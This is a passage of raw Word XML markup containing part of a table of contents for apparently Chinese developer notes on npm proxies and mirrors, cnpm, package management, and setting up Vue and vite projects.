            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>647</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7C01341C" w14:textId="4228DFD6" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780095" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>npm</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>设置代理</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780095 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>648</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="55391579" w14:textId="177F062B" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780096" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>设置代理</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780096 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>648</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="09F9B42D" w14:textId="32593619" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780097" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>关于</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>https</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780097 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>648</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4B81E76E" w14:textId="358CB068" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780098" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>取消代理</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780098 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>648</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="519852EF" w14:textId="5A04EFFE" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780099" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">npm </w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>设置国内源</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780099 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>648</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5BB26AD9" w14:textId="0FEF6974" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780100" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>国内镜像</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>cnpm</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>（强力推荐安装！很快！快一万倍！）</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780100 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>649</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="66B9E05F" w14:textId="4CE46302" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780101" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>查看全局包路径</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780101 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>649</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="03E178AD" w14:textId="2541051B" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780102" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>卸载包、安装包</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780102 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>649</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7BDF485B" w14:textId="13528B76" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780103" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>项目卸载</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780103 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>650</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3FE7BE26" w14:textId="00EB6744" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780104" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>安装</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>VUE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780104 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>650</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="387691A5" w14:textId="275D09CF" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780105" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>VUE</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>的简单使用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780105 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>651</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="37BE389D" w14:textId="3466FD2A" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780106" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>其一</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>:vue init webpack</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780106 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>651</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="178EB86D" w14:textId="3300E2B6" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780107" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>其二</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>: cnpm init vue@lastest</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780107 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>653</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5945FBD2" w14:textId="39503647" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780108" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>其三：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>npx create-vue@latest my-vue-app</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780108 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>655</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6CDA9967" w14:textId="3FBBAF3F" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780109" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>vite</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>构建项目配置使用</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ip</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>和端口</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780109 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>655</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="193BF6C3" w14:textId="6B35C9B1" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780110" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>VUE</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>学习</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>网课</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780110 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>656</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2C765183" w14:textId="75E5A1C5" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780111" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>安装与运行：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>vite</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
